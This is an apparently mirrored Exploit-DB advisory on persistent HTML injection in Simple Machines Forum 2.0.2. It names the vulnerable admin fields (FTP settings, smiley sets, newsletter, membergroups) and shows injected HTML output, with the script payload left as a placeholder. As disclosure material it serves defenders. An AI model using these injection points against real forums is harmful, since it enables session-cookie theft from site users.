Simple Machines 2.0.2 – Multiple HTML Injection Vulnerabilities

• Exploit Database
• 101 阅读

• 作者： Benjamin Kunz Mejri
  日期： 2012-07-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37505/

• source: https://www.securityfocus.com/bid/54456/info
  
  Simple Machines is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
  
  Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
  
  Simple Machines Forum 2.0.2 is vulnerable; other versions may also be affected. 
  
  Proof of Concept:
  =================
  The persistent input validation vulnerability can be exploited by remote attacker with local low privileged user account & low required 
  user inter action. For demonstration or reproduce ...
  
  Review: Package Manager > Download New Packages > FTP Information Required (Listing)
  
  <dd>
  <input size="30" name="ftp_server" id="ftp_server" type="text"><[PERSISTENT SCRIPT CODE]' <"="" class="input_text">
  <label for="ftp_port">Port:&nbsp;</label> 
  <input type="text" size="3" name="ftp_port" id="ftp_port" value="21" 
  class="input_text" />
  
  ... or
  
  
  <dd>
  <input size="50" name="ftp_path" id="ftp_path" value="public_html/demo/smf " 
  type="text"><[PERSISTENT SCRIPT CODE])' <"="" style="width: 99%;" class="input_text">
  </dd>
  </dl>
  <div class="righttext">
  
  
  URL: http://www.example.com/smf/index.php?action=admin;area=packages;sa=packageget;get;f5073d7837d8=5a2bdd540a245be265f26c102fff9626
  
  
  
  Review: Smiley Sets > Add
  
  <tr class="windowbg" id="list_smiley_set_list_0">
  <td style="text-align: center;"></td>
  <td class="windowbg">Akyhne's Set</td>
  <td class="windowbg">"><[PERSISTENT SCRIPT CODE]' <="" <strong="">
  akyhne</strong>/...</td>
  
  
  URL: http://www.example.com/smf/index.php?action=admin;area=smileys;sa=modifyset;set=2
  
  
  Review: Newsletter > Add
  
  <input name="email_force" value="0" type="hidden">
  <input name="total_emails" value="1" type="hidden">
  <input name="max_id_member" value="13" type="hidden">
  <input name="groups" value="0,1,2,3" type="hidden">
  <input name="exclude_groups" value="0,1,2,3" type="hidden">
  <input name="members" value="" type="hidden">
  <input name="exclude_members" value="" type="hidden">
  <input name="emails" value="" type="hidden"><[PERSISTENT SCRIPT CODE])' <"="">
  </form>
  </div>
  <br class="clear" />
  </div>
  
  URL: http://www.example.com/smf/index.php?action=admin;area=news;sa=mailingmembers;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
  
  
  Review: Edit Membergroups & User/Groups Listing
  
  <h3 class="catbg">Edit Membergroup - "><[PERSISTENT SCRIPT CODE])' <"=""><[PERSISTENT SCRIPT CODE]) <"
  ><ifram
  </h3>
  </div>
  <div class="windowbg2">
  <span class="topslice"><span></span></span>
  
  URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=index;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
  URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
  

  Python

  Copy